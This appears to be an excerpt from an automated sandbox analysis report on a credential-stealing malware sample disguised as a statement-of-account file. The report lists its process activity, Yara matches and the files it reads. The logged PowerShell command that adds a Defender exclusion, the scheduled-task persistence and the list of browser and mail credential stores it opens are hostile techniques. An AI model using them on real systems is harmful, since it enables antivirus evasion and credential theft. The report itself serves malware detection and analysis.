Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpC678.tmp"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TgfQNrhQjjseHY" /XML "C:\Users\user\AppData\Local\Temp\tmpD609.tmp"
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Queries volume information: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe VolumeInformation
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Queries volume information: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\TgfQNrhQjjseHY.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\UPDATED SSTATEMENT OF ACCOUNT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3349333951.0000000002A9E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 4548, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.3349333951.0000000002A72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2142116748.000000000509F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2180777401.0000000004510000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: UPDATED SSTATEMENT OF ACCOUNT.exe PID: 6516, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 3392, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: TgfQNrhQjjseHY.exe PID: 4460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: MSBuild.exe PID: 4548, type: MEMORYSTR

                    Remote Access Functionality

Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.454bfd8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.50dafa0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.TgfQNrhQjjseHY.exe.45107b8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.UPDATED SSTATEMENT OF ACCOUNT.exe.509f780.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.2160120971.0000000002F33000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2156023579.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2160120971.0000000002F5F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
